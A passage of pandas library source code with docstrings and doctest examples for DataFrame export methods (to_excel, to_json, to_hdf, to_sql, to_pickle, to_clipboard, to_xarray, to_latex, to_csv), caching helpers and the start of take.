via the options ``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
merge_cells : bool, default True
Write MultiIndex and Hierarchical Rows as merged cells.
encoding : str, optional
Encoding of the resulting excel file. Only necessary for xlwt,
other writers support unicode natively.
inf_rep : str, default 'inf'
Representation for infinity (there is no native representation for
infinity in Excel).
verbose : bool, default True
Display more information in the error logs.
freeze_panes : tuple of int (length 2), optional
Specifies the one-based bottommost row and rightmost column that
is to be frozen.
See Also
--------
to_csv : Write DataFrame to a comma-separated values (csv) file.
ExcelWriter : Class for writing DataFrame objects into excel sheets.
read_excel : Read an Excel file into a pandas DataFrame.
read_csv : Read a comma-separated values (csv) file into DataFrame.
Notes
-----
For compatibility with :meth:`~DataFrame.to_csv`,
to_excel serializes lists and dicts to strings before writing.
Once a workbook has been saved it is not possible write further data
without rewriting the whole workbook.
Examples
--------
Create, write to and save a workbook:
>>> df1 = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df1.to_excel("output.xlsx") # doctest: +SKIP
To specify the sheet name:
>>> df1.to_excel("output.xlsx",
... sheet_name='Sheet_name_1') # doctest: +SKIP
If you wish to write to more than one sheet in the workbook, it is
necessary to specify an ExcelWriter object:
>>> df2 = df1.copy()
>>> with pd.ExcelWriter('output.xlsx') as writer: # doctest: +SKIP
... df1.to_excel(writer, sheet_name='Sheet_name_1')
... df2.to_excel(writer, sheet_name='Sheet_name_2')
ExcelWriter can also be used to append to an existing Excel file:
>>> with pd.ExcelWriter('output.xlsx',
... mode='a') as writer: # doctest: +SKIP
... df.to_excel(writer, sheet_name='Sheet_name_3')
To set the library that is used to write the Excel file,
you can pass the `engine` keyword (the default engine is
automatically chosen depending on the file extension):
>>> df1.to_excel('output1.xlsx', engine='xlsxwriter') # doctest: +SKIP
"""
@Appender(_shared_docs["to_excel"] % dict(klass="object"))
def to_excel(
self,
excel_writer,
sheet_name="Sheet1",
na_rep="",
float_format=None,
columns=None,
header=True,
index=True,
index_label=None,
startrow=0,
startcol=0,
engine=None,
merge_cells=True,
encoding=None,
inf_rep="inf",
verbose=True,
freeze_panes=None,
) -> None:
df = self if isinstance(self, ABCDataFrame) else self.to_frame()
from pandas.io.formats.excel import ExcelFormatter
formatter = ExcelFormatter(
df,
na_rep=na_rep,
cols=columns,
header=header,
float_format=float_format,
index=index,
index_label=index_label,
merge_cells=merge_cells,
inf_rep=inf_rep,
)
formatter.write(
excel_writer,
sheet_name=sheet_name,
startrow=startrow,
startcol=startcol,
freeze_panes=freeze_panes,
engine=engine,
)
def to_json(
self,
path_or_buf: Optional[FilePathOrBuffer] = None,
orient: Optional[str] = None,
date_format: Optional[str] = None,
double_precision: int = 10,
force_ascii: bool_t = True,
date_unit: str = "ms",
default_handler: Optional[Callable[[Any], JSONSerializable]] = None,
lines: bool_t = False,
compression: Optional[str] = "infer",
index: bool_t = True,
indent: Optional[int] = None,
) -> Optional[str]:
"""
Convert the object to a JSON string.
Note NaN's and None will be converted to null and datetime objects
will be converted to UNIX timestamps.
Parameters
----------
path_or_buf : str or file handle, optional
File path or object. If not specified, the result is returned as
a string.
orient : str
Indication of expected JSON string format.
* Series:
- default is 'index'
- allowed values are: {'split','records','index','table'}.
* DataFrame:
- default is 'columns'
- allowed values are: {'split', 'records', 'index', 'columns',
'values', 'table'}.
* The format of the JSON string:
- 'split' : dict like {'index' -> [index], 'columns' -> [columns],
'data' -> [values]}
- 'records' : list like [{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
- 'columns' : dict like {column -> {index -> value}}
- 'values' : just the values array
- 'table' : dict like {'schema': {schema}, 'data': {data}}
Describing the data, where data component is like ``orient='records'``.
.. versionchanged:: 0.20.0
date_format : {None, 'epoch', 'iso'}
Type of date conversion. 'epoch' = epoch milliseconds,
'iso' = ISO8601. The default depends on the `orient`. For
``orient='table'``, the default is 'iso'. For all other orients,
the default is 'epoch'.
double_precision : int, default 10
The number of decimal places to use when encoding
floating point values.
force_ascii : bool, default True
Force encoded string to be ASCII.
date_unit : str, default 'ms' (milliseconds)
The time unit to encode to, governs timestamp and ISO8601
precision. One of 's', 'ms', 'us', 'ns' for second, millisecond,
microsecond, and nanosecond respectively.
default_handler : callable, default None
Handler to call if object cannot otherwise be converted to a
suitable format for JSON. Should receive a single argument which is
the object to convert and return a serialisable object.
lines : bool, default False
If 'orient' is 'records' write out line delimited json format. Will
throw ValueError if incorrect 'orient' since others are not list
like.
compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}
A string representing the compression to use in the output file,
only used when the first argument is a filename. By default, the
compression is inferred from the filename.
.. versionadded:: 0.21.0
.. versionchanged:: 0.24.0
'infer' option added and set to default
index : bool, default True
Whether to include the index values in the JSON string. Not
including the index (``index=False``) is only supported when
orient is 'split' or 'table'.
.. versionadded:: 0.23.0
indent : int, optional
Length of whitespace used to indent each record.
.. versionadded:: 1.0.0
Returns
-------
None or str
If path_or_buf is None, returns the resulting json format as a
string. Otherwise returns None.
See Also
--------
read_json : Convert a JSON string to pandas object.
Notes
-----
The behavior of ``indent=0`` varies from the stdlib, which does not
indent the output but does insert newlines. Currently, ``indent=0``
and the default ``indent=None`` are equivalent in pandas, though this
may change in a future release.
Examples
--------
>>> df = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df.to_json(orient='split')
'{"columns":["col 1","col 2"],
"index":["row 1","row 2"],
"data":[["a","b"],["c","d"]]}'
Encoding/decoding a Dataframe using ``'records'`` formatted JSON.
Note that index labels are not preserved with this encoding.
>>> df.to_json(orient='records')
'[{"col 1":"a","col 2":"b"},{"col 1":"c","col 2":"d"}]'
Encoding/decoding a Dataframe using ``'index'`` formatted JSON:
>>> df.to_json(orient='index')
'{"row 1":{"col 1":"a","col 2":"b"},"row 2":{"col 1":"c","col 2":"d"}}'
Encoding/decoding a Dataframe using ``'columns'`` formatted JSON:
>>> df.to_json(orient='columns')
'{"col 1":{"row 1":"a","row 2":"c"},"col 2":{"row 1":"b","row 2":"d"}}'
Encoding/decoding a Dataframe using ``'values'`` formatted JSON:
>>> df.to_json(orient='values')
'[["a","b"],["c","d"]]'
Encoding with Table Schema
>>> df.to_json(orient='table')
'{"schema": {"fields": [{"name": "index", "type": "string"},
{"name": "col 1", "type": "string"},
{"name": "col 2", "type": "string"}],
"primaryKey": "index",
"pandas_version": "0.20.0"},
"data": [{"index": "row 1", "col 1": "a", "col 2": "b"},
{"index": "row 2", "col 1": "c", "col 2": "d"}]}'
"""
from pandas.io import json
if date_format is None and orient == "table":
date_format = "iso"
elif date_format is None:
date_format = "epoch"
config.is_nonnegative_int(indent)
indent = indent or 0
return json.to_json(
path_or_buf=path_or_buf,
obj=self,
orient=orient,
date_format=date_format,
double_precision=double_precision,
force_ascii=force_ascii,
date_unit=date_unit,
default_handler=default_handler,
lines=lines,
compression=compression,
index=index,
indent=indent,
)
def to_hdf(
self,
path_or_buf,
key: str,
mode: str = "a",
complevel: Optional[int] = None,
complib: Optional[str] = None,
append: bool_t = False,
format: Optional[str] = None,
index: bool_t = True,
min_itemsize: Optional[Union[int, Dict[str, int]]] = None,
nan_rep=None,
dropna: Optional[bool_t] = None,
data_columns: Optional[List[str]] = None,
errors: str = "strict",
encoding: str = "UTF-8",
) -> None:
"""
Write the contained data to an HDF5 file using HDFStore.
Hierarchical Data Format (HDF) is self-describing, allowing an
application to interpret the structure and contents of a file with
no outside information. One HDF file can hold a mix of related objects
which can be accessed as a group or as individual objects.
In order to add another DataFrame or Series to an existing HDF file
please use append mode and a different a key.
For more information see the :ref:`user guide <io.hdf5>`.
Parameters
----------
path_or_buf : str or pandas.HDFStore
File path or HDFStore object.
key : str
Identifier for the group in the store.
mode : {'a', 'w', 'r+'}, default 'a'
Mode to open file:
- 'w': write, a new file is created (an existing file with
the same name would be deleted).
- 'a': append, an existing file is opened for reading and
writing, and if the file does not exist it is created.
- 'r+': similar to 'a', but the file must already exist.
complevel : {0-9}, optional
Specifies a compression level for data.
A value of 0 disables compression.
complib : {'zlib', 'lzo', 'bzip2', 'blosc'}, default 'zlib'
Specifies the compression library to be used.
As of v0.20.2 these additional compressors for Blosc are supported
(default if no compressor specified: 'blosc:blosclz'):
{'blosc:blosclz', 'blosc:lz4', 'blosc:lz4hc', 'blosc:snappy',
'blosc:zlib', 'blosc:zstd'}.
Specifying a compression library which is not available issues
a ValueError.
append : bool, default False
For Table formats, append the input data to the existing.
format : {'fixed', 'table', None}, default 'fixed'
Possible values:
- 'fixed': Fixed format. Fast writing/reading. Not-appendable,
nor searchable.
- 'table': Table format. Write as a PyTables Table structure
which may perform worse but allow more flexible operations
like searching / selecting subsets of the data.
- If None, pd.get_option('io.hdf.default_format') is checked,
followed by fallback to "fixed"
errors : str, default 'strict'
Specifies how encoding and decoding errors are to be handled.
See the errors argument for :func:`open` for a full list
of options.
encoding : str, default "UTF-8"
min_itemsize : dict or int, optional
Map column names to minimum string sizes for columns.
nan_rep : Any, optional
How to represent null values as str.
Not allowed with append=True.
data_columns : list of columns or True, optional
List of columns to create as indexed data columns for on-disk
queries, or True to use all columns. By default only the axes
of the object are indexed. See :ref:`io.hdf5-query-data-columns`.
Applicable only to format='table'.
See Also
--------
DataFrame.read_hdf : Read from HDF file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_feather : Write out feather-format for DataFrames.
DataFrame.to_csv : Write out to a csv file.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]},
... index=['a', 'b', 'c'])
>>> df.to_hdf('data.h5', key='df', mode='w')
We can add another object to the same file:
>>> s = pd.Series([1, 2, 3, 4])
>>> s.to_hdf('data.h5', key='s')
Reading from HDF file:
>>> pd.read_hdf('data.h5', 'df')
A B
a 1 4
b 2 5
c 3 6
>>> pd.read_hdf('data.h5', 's')
0 1
1 2
2 3
3 4
dtype: int64
Deleting file with data:
>>> import os
>>> os.remove('data.h5')
"""
from pandas.io import pytables
pytables.to_hdf(
path_or_buf,
key,
self,
mode=mode,
complevel=complevel,
complib=complib,
append=append,
format=format,
index=index,
min_itemsize=min_itemsize,
nan_rep=nan_rep,
dropna=dropna,
data_columns=data_columns,
errors=errors,
encoding=encoding,
)
def to_sql(
self,
name: str,
con,
schema=None,
if_exists: str = "fail",
index: bool_t = True,
index_label=None,
chunksize=None,
dtype=None,
method=None,
) -> None:
"""
Write records stored in a DataFrame to a SQL database.
Databases supported by SQLAlchemy [1]_ are supported. Tables can be
newly created, appended to, or overwritten.
Parameters
----------
name : str
Name of SQL table.
con : sqlalchemy.engine.Engine or sqlite3.Connection
Using SQLAlchemy makes it possible to use any DB supported by that
library. Legacy support is provided for sqlite3.Connection objects. The user
is responsible for engine disposal and connection closure for the SQLAlchemy
connectable See `here \
<https://docs.sqlalchemy.org/en/13/core/connections.html>`_.
schema : str, optional
Specify the schema (if database flavor supports this). If None, use
default schema.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
How to behave if the table already exists.
* fail: Raise a ValueError.
* replace: Drop the table before inserting new values.
* append: Insert new values to the existing table.
index : bool, default True
Write DataFrame index as a column. Uses `index_label` as the column
name in the table.
index_label : str or sequence, default None
Column label for index column(s). If None is given (default) and
`index` is True, then the index names are used.
A sequence should be given if the DataFrame uses MultiIndex.
chunksize : int, optional
Specify the number of rows in each batch to be written at a time.
By default, all rows will be written at once.
dtype : dict or scalar, optional
Specifying the datatype for columns. If a dictionary is used, the
keys should be the column names and the values should be the
SQLAlchemy types or strings for the sqlite3 legacy mode. If a
scalar is provided, it will be applied to all columns.
method : {None, 'multi', callable}, optional
Controls the SQL insertion clause used:
* None : Uses standard SQL ``INSERT`` clause (one per row).
* 'multi': Pass multiple values in a single ``INSERT`` clause.
* callable with signature ``(pd_table, conn, keys, data_iter)``.
Details and a sample callable implementation can be found in the
section :ref:`insert method <io.sql.method>`.
.. versionadded:: 0.24.0
Raises
------
ValueError
When the table already exists and `if_exists` is 'fail' (the
default).
See Also
--------
read_sql : Read a DataFrame from a table.
Notes
-----
Timezone aware datetime columns will be written as
``Timestamp with timezone`` type with SQLAlchemy if supported by the
database. Otherwise, the datetimes will be stored as timezone unaware
timestamps local to the original timezone.
.. versionadded:: 0.24.0
References
----------
.. [1] https://docs.sqlalchemy.org
.. [2] https://www.python.org/dev/peps/pep-0249/
Examples
--------
Create an in-memory SQLite database.
>>> from sqlalchemy import create_engine
>>> engine = create_engine('sqlite://', echo=False)
Create a table from scratch with 3 rows.
>>> df = pd.DataFrame({'name' : ['User 1', 'User 2', 'User 3']})
>>> df
name
0 User 1
1 User 2
2 User 3
>>> df.to_sql('users', con=engine)
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3')]
>>> df1 = pd.DataFrame({'name' : ['User 4', 'User 5']})
>>> df1.to_sql('users', con=engine, if_exists='append')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3'),
(0, 'User 4'), (1, 'User 5')]
Overwrite the table with just ``df1``.
>>> df1.to_sql('users', con=engine, if_exists='replace',
... index_label='id')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 4'), (1, 'User 5')]
Specify the dtype (especially useful for integers with missing values).
Notice that while pandas is forced to store the data as floating point,
the database supports nullable integers. When fetching the data with
Python, we get back integer scalars.
>>> df = pd.DataFrame({"A": [1, None, 2]})
>>> df
A
0 1.0
1 NaN
2 2.0
>>> from sqlalchemy.types import Integer
>>> df.to_sql('integers', con=engine, index=False,
... dtype={"A": Integer()})
>>> engine.execute("SELECT * FROM integers").fetchall()
[(1,), (None,), (2,)]
"""
from pandas.io import sql
sql.to_sql(
self,
name,
con,
schema=schema,
if_exists=if_exists,
index=index,
index_label=index_label,
chunksize=chunksize,
dtype=dtype,
method=method,
)
def to_pickle(
self,
path,
compression: Optional[str] = "infer",
protocol: int = pickle.HIGHEST_PROTOCOL,
) -> None:
"""
Pickle (serialize) object to file.
Parameters
----------
path : str
File path where the pickled object will be stored.
compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}, \
default 'infer'
A string representing the compression to use in the output file. By
default, infers from the file extension in specified path.
protocol : int
Int which indicates which protocol should be used by the pickler,
default HIGHEST_PROTOCOL (see [1]_ paragraph 12.1.2). The possible
values are 0, 1, 2, 3, 4. A negative value for the protocol
parameter is equivalent to setting its value to HIGHEST_PROTOCOL.
.. [1] https://docs.python.org/3/library/pickle.html.
.. versionadded:: 0.21.0.
See Also
--------
read_pickle : Load pickled pandas object (or any object) from file.
DataFrame.to_hdf : Write DataFrame to an HDF5 file.
DataFrame.to_sql : Write DataFrame to a SQL database.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
Examples
--------
>>> original_df = pd.DataFrame({"foo": range(5), "bar": range(5, 10)})
>>> original_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> original_df.to_pickle("./dummy.pkl")
>>> unpickled_df = pd.read_pickle("./dummy.pkl")
>>> unpickled_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> import os
>>> os.remove("./dummy.pkl")
"""
from pandas.io.pickle import to_pickle
to_pickle(self, path, compression=compression, protocol=protocol)
def to_clipboard(
self, excel: bool_t = True, sep: Optional[str] = None, **kwargs
) -> None:
r"""
Copy object to the system clipboard.
Write a text representation of object to the system clipboard.
This can be pasted into Excel, for example.
Parameters
----------
excel : bool, default True
Produce output in a csv format for easy pasting into excel.
- True, use the provided separator for csv pasting.
- False, write a string representation of the object to the clipboard.
sep : str, default ``'\t'``
Field delimiter.
**kwargs
These parameters will be passed to DataFrame.to_csv.
See Also
--------
DataFrame.to_csv : Write a DataFrame to a comma-separated values
(csv) file.
read_clipboard : Read text from clipboard and pass to read_table.
Notes
-----
Requirements for your platform.
- Linux : `xclip`, or `xsel` (with `PyQt4` modules)
- Windows : none
- OS X : none
Examples
--------
Copy the contents of a DataFrame to the clipboard.
>>> df = pd.DataFrame([[1, 2, 3], [4, 5, 6]], columns=['A', 'B', 'C'])
>>> df.to_clipboard(sep=',')
... # Wrote the following to the system clipboard:
... # ,A,B,C
... # 0,1,2,3
... # 1,4,5,6
We can omit the index by passing the keyword `index` and setting
it to false.
>>> df.to_clipboard(sep=',', index=False)
... # Wrote the following to the system clipboard:
... # A,B,C
... # 1,2,3
... # 4,5,6
"""
from pandas.io import clipboards
clipboards.to_clipboard(self, excel=excel, sep=sep, **kwargs)
def to_xarray(self):
"""
Return an xarray object from the pandas object.
Returns
-------
xarray.DataArray or xarray.Dataset
Data in the pandas structure converted to Dataset if the object is
a DataFrame, or a DataArray if the object is a Series.
See Also
--------
DataFrame.to_hdf : Write DataFrame to an HDF5 file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
Notes
-----
See the `xarray docs <https://xarray.pydata.org/en/stable/>`__
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0, 2),
... ('parrot', 'bird', 24.0, 2),
... ('lion', 'mammal', 80.5, 4),
... ('monkey', 'mammal', np.nan, 4)],
... columns=['name', 'class', 'max_speed',
... 'num_legs'])
>>> df
name class max_speed num_legs
0 falcon bird 389.0 2
1 parrot bird 24.0 2
2 lion mammal 80.5 4
3 monkey mammal NaN 4
>>> df.to_xarray()
<xarray.Dataset>
Dimensions: (index: 4)
Coordinates:
* index (index) int64 0 1 2 3
Data variables:
name (index) object 'falcon' 'parrot' 'lion' 'monkey'
class (index) object 'bird' 'bird' 'mammal' 'mammal'
max_speed (index) float64 389.0 24.0 80.5 nan
num_legs (index) int64 2 2 4 4
>>> df['max_speed'].to_xarray()
<xarray.DataArray 'max_speed' (index: 4)>
array([389. , 24. , 80.5, nan])
Coordinates:
* index (index) int64 0 1 2 3
>>> dates = pd.to_datetime(['2018-01-01', '2018-01-01',
... '2018-01-02', '2018-01-02'])
>>> df_multiindex = pd.DataFrame({'date': dates,
... 'animal': ['falcon', 'parrot',
... 'falcon', 'parrot'],
... 'speed': [350, 18, 361, 15]})
>>> df_multiindex = df_multiindex.set_index(['date', 'animal'])
>>> df_multiindex
speed
date animal
2018-01-01 falcon 350
parrot 18
2018-01-02 falcon 361
parrot 15
>>> df_multiindex.to_xarray()
<xarray.Dataset>
Dimensions: (animal: 2, date: 2)
Coordinates:
* date (date) datetime64[ns] 2018-01-01 2018-01-02
* animal (animal) object 'falcon' 'parrot'
Data variables:
speed (date, animal) int64 350 18 361 15
"""
xarray = import_optional_dependency("xarray")
if self.ndim == 1:
return xarray.DataArray.from_series(self)
else:
return xarray.Dataset.from_dataframe(self)
@Substitution(returns=fmt.return_docstring)
def to_latex(
self,
buf=None,
columns=None,
col_space=None,
header=True,
index=True,
na_rep="NaN",
formatters=None,
float_format=None,
sparsify=None,
index_names=True,
bold_rows=False,
column_format=None,
longtable=None,
escape=None,
encoding=None,
decimal=".",
multicolumn=None,
multicolumn_format=None,
multirow=None,
caption=None,
label=None,
):
r"""
Render object to a LaTeX tabular, longtable, or nested table/tabular.
Requires ``\usepackage{booktabs}``. The output can be copy/pasted
into a main LaTeX document or read from an external file
with ``\input{table.tex}``.
.. versionchanged:: 0.20.2
Added to Series.
.. versionchanged:: 1.0.0
Added caption and label arguments.
Parameters
----------
buf : str, Path or StringIO-like, optional, default None
Buffer to write to. If None, the output is returned as a string.
columns : list of label, optional
The subset of columns to write. Writes all columns by default.
col_space : int, optional
The minimum width of each column.
header : bool or list of str, default True
Write out the column names. If a list of strings is given,
it is assumed to be aliases for the column names.
index : bool, default True
Write row names (index).
na_rep : str, default 'NaN'
Missing data representation.
formatters : list of functions or dict of {str: function}, optional
Formatter functions to apply to columns' elements by position or
name. The result of each function must be a unicode string.
List must be of length equal to the number of columns.
float_format : one-parameter function or str, optional, default None
Formatter for floating point numbers. For example
``float_format="%%.2f"`` and ``float_format="{:0.2f}".format`` will
both result in 0.1234 being formatted as 0.12.
sparsify : bool, optional
Set to False for a DataFrame with a hierarchical index to print
every multiindex key at each row. By default, the value will be
read from the config module.
index_names : bool, default True
Prints the names of the indexes.
bold_rows : bool, default False
Make the row labels bold in the output.
column_format : str, optional
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g. 'rcl' for 3
columns. By default, 'l' will be used for all columns except
columns of numbers, which default to 'r'.
longtable : bool, optional
By default, the value will be read from the pandas config
module. Use a longtable environment instead of tabular. Requires
adding a \usepackage{longtable} to your LaTeX preamble.
escape : bool, optional
By default, the value will be read from the pandas config
module. When set to False prevents from escaping latex special
characters in column names.
encoding : str, optional
A string representing the encoding to use in the output file,
defaults to 'utf-8'.
decimal : str, default '.'
Character recognized as decimal separator, e.g. ',' in Europe.
multicolumn : bool, default True
Use \multicolumn to enhance MultiIndex columns.
The default will be read from the config module.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
The default will be read from the config module.
multirow : bool, default False
Use \multirow to enhance MultiIndex rows. Requires adding a
\usepackage{multirow} to your LaTeX preamble. Will print
centered labels (instead of top-aligned) across the contained
rows, separating groups via clines. The default will be read
from the pandas config module.
caption : str, optional
The LaTeX caption to be placed inside ``\caption{}`` in the output.
.. versionadded:: 1.0.0
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
This is used with ``\ref{}`` in the main ``.tex`` file.
.. versionadded:: 1.0.0
%(returns)s
See Also
--------
DataFrame.to_string : Render a DataFrame to a console-friendly
tabular output.
DataFrame.to_html : Render a DataFrame as an HTML table.
Examples
--------
>>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
... 'mask': ['red', 'purple'],
... 'weapon': ['sai', 'bo staff']})
>>> print(df.to_latex(index=False)) # doctest: +NORMALIZE_WHITESPACE
\begin{tabular}{lll}
\toprule
name & mask & weapon \\
\midrule
Raphael & red & sai \\
Donatello & purple & bo staff \\
\bottomrule
\end{tabular}
"""
# Get defaults from the pandas config
if self.ndim == 1:
self = self.to_frame()
if longtable is None:
longtable = config.get_option("display.latex.longtable")
if escape is None:
escape = config.get_option("display.latex.escape")
if multicolumn is None:
multicolumn = config.get_option("display.latex.multicolumn")
if multicolumn_format is None:
multicolumn_format = config.get_option("display.latex.multicolumn_format")
if multirow is None:
multirow = config.get_option("display.latex.multirow")
formatter = DataFrameFormatter(
self,
columns=columns,
col_space=col_space,
na_rep=na_rep,
header=header,
index=index,
formatters=formatters,
float_format=float_format,
bold_rows=bold_rows,
sparsify=sparsify,
index_names=index_names,
escape=escape,
decimal=decimal,
)
return formatter.to_latex(
buf=buf,
column_format=column_format,
longtable=longtable,
encoding=encoding,
multicolumn=multicolumn,
multicolumn_format=multicolumn_format,
multirow=multirow,
caption=caption,
label=label,
)
def to_csv(
self,
path_or_buf: Optional[FilePathOrBuffer] = None,
sep: str = ",",
na_rep: str = "",
float_format: Optional[str] = None,
columns: Optional[Sequence[Label]] = None,
header: Union[bool_t, List[str]] = True,
index: bool_t = True,
index_label: Optional[Union[bool_t, str, Sequence[Label]]] = None,
mode: str = "w",
encoding: Optional[str] = None,
compression: Optional[Union[str, Mapping[str, str]]] = "infer",
quoting: Optional[int] = None,
quotechar: str = '"',
line_terminator: Optional[str] = None,
chunksize: Optional[int] = None,
date_format: Optional[str] = None,
doublequote: bool_t = True,
escapechar: Optional[str] = None,
decimal: Optional[str] = ".",
) -> Optional[str]:
r"""
Write object to a comma-separated values (csv) file.
.. versionchanged:: 0.24.0
The order of arguments for Series was changed.
Parameters
----------
path_or_buf : str or file handle, default None
File path or object, if None is provided the result is returned as
a string. If a file object is passed it should be opened with
`newline=''`, disabling universal newlines.
.. versionchanged:: 0.24.0
Was previously named "path" for Series.
sep : str, default ','
String of length 1. Field delimiter for the output file.
na_rep : str, default ''
Missing data representation.
float_format : str, default None
Format string for floating point numbers.
columns : sequence, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names.
.. versionchanged:: 0.24.0
Previously defaulted to False for Series.
index : bool, default True
Write row names (index).
index_label : str or sequence, or False, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the object uses MultiIndex. If
False do not print fields for index names. Use index_label=False
for easier importing in R.
mode : str
Python write mode, default 'w'.
encoding : str, optional
A string representing the encoding to use in the output file,
defaults to 'utf-8'.
compression : str or dict, default 'infer'
If str, represents compression mode. If dict, value at 'method' is
the compression mode. Compression mode may be any of the following
possible values: {'infer', 'gzip', 'bz2', 'zip', 'xz', None}. If
compression mode is 'infer' and `path_or_buf` is path-like, then
detect compression mode from the following extensions: '.gz',
'.bz2', '.zip' or '.xz'. (otherwise no compression). If dict given
and mode is 'zip' or inferred as 'zip', other entries passed as
additional compression options.
.. versionchanged:: 1.0.0
May now be a dict with key 'method' as compression mode
and other entries as additional compression options if
compression mode is 'zip'.
quoting : optional constant from csv module
Defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
will treat them as non-numeric.
quotechar : str, default '\"'
String of length 1. Character used to quote fields.
line_terminator : str, optional
The newline character or character sequence to use in the output
file. Defaults to `os.linesep`, which depends on the OS in which
this method is called ('\n' for linux, '\r\n' for Windows, i.e.).
.. versionchanged:: 0.24.0
chunksize : int or None
Rows to write at a time.
date_format : str, default None
Format string for datetime objects.
doublequote : bool, default True
Control quoting of `quotechar` inside a field.
escapechar : str, default None
String of length 1. Character used to escape `sep` and `quotechar`
when appropriate.
decimal : str, default '.'
Character recognized as decimal separator. E.g. use ',' for
European data.
Returns
-------
None or str
If path_or_buf is None, returns the resulting csv format as a
string. Otherwise returns None.
See Also
--------
read_csv : Load a CSV file into a DataFrame.
to_excel : Write DataFrame to an Excel file.
Examples
--------
>>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
... 'mask': ['red', 'purple'],
... 'weapon': ['sai', 'bo staff']})
>>> df.to_csv(index=False)
'name,mask,weapon\nRaphael,red,sai\nDonatello,purple,bo staff\n'
Create 'out.zip' containing 'out.csv'
>>> compression_opts = dict(method='zip',
... archive_name='out.csv') # doctest: +SKIP
>>> df.to_csv('out.zip', index=False,
... compression=compression_opts) # doctest: +SKIP
"""
df = self if isinstance(self, ABCDataFrame) else self.to_frame()
from pandas.io.formats.csvs import CSVFormatter
formatter = CSVFormatter(
df,
path_or_buf,
line_terminator=line_terminator,
sep=sep,
encoding=encoding,
compression=compression,
quoting=quoting,
na_rep=na_rep,
float_format=float_format,
cols=columns,
header=header,
index=index,
index_label=index_label,
mode=mode,
chunksize=chunksize,
quotechar=quotechar,
date_format=date_format,
doublequote=doublequote,
escapechar=escapechar,
decimal=decimal,
)
formatter.save()
if path_or_buf is None:
return formatter.path_or_buf.getvalue()
return None
# ----------------------------------------------------------------------
# Lookup Caching
def _set_as_cached(self, item, cacher) -> None:
"""
Set the _cacher attribute on the calling object with a weakref to
cacher.
"""
self._cacher = (item, weakref.ref(cacher))
def _reset_cacher(self) -> None:
"""
Reset the cacher.
"""
if hasattr(self, "_cacher"):
del self._cacher
def _maybe_cache_changed(self, item, value) -> None:
"""
The object has called back to us saying maybe it has changed.
"""
self._data.set(item, value)
@property
def _is_cached(self) -> bool_t:
"""Return boolean indicating if self is cached or not."""
return getattr(self, "_cacher", None) is not None
def _get_cacher(self):
"""return my cacher or None"""
cacher = getattr(self, "_cacher", None)
if cacher is not None:
cacher = cacher[1]()
return cacher
def _maybe_update_cacher(
self, clear: bool_t = False, verify_is_copy: bool_t = True
) -> None:
"""
See if we need to update our parent cacher if clear, then clear our
cache.
Parameters
----------
clear : bool, default False
Clear the item cache.
verify_is_copy : bool, default True
Provide is_copy checks.
"""
cacher = getattr(self, "_cacher", None)
if cacher is not None:
ref = cacher[1]()
# we are trying to reference a dead referant, hence
# a copy
if ref is None:
del self._cacher
else:
# Note: we need to call ref._maybe_cache_changed even in the
# case where it will raise. (Uh, not clear why)
try:
ref._maybe_cache_changed(cacher[0], self)
except AssertionError:
# ref._data.setitem can raise
# AssertionError because of shape mismatch
pass
if verify_is_copy:
self._check_setitem_copy(stacklevel=5, t="referant")
if clear:
self._clear_item_cache()
def _clear_item_cache(self) -> None:
self._item_cache.clear()
# ----------------------------------------------------------------------
# Indexing Methods
def take(
self: FrameOrSeries, indices, axis=0, is_copy: Optional[bool_t] = None, **kwargs
) -> FrameOrSeries:
"""
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : {0 or 'index', 1 or 'columns', None}, default 0
The axis on which to select elements. ``0`` means that we are
selecting rows, ``1`` means that we are selecting columns.
is_copy : bool
Before pandas 1.0, ``is_copy=False`` can be specified to ensure
that the return value is an actual copy. Starting with pandas 1.0,
``take`` always returns a copy, and the keyword is therefore
deprecated.
.. deprecated:: 1.0.0
**kwargs
For compatibility with :meth:`numpy.take`. Has no effect on the
output.
Returns
-------
taken : same type as caller
An array-like containing the elements taken from the object.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by labels.
DataFrame.iloc : Select a subset of a DataFrame by positions.
numpy.take : Take elements from an array along an axis.
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=['name', 'class', 'max_speed'],
... index=[0, 2, 3, 1])
>>> df
name class max_speed
0 falcon bird 389.0
2 parrot bird 24.0
3 lion mammal 80.5
1 monkey mammal NaN
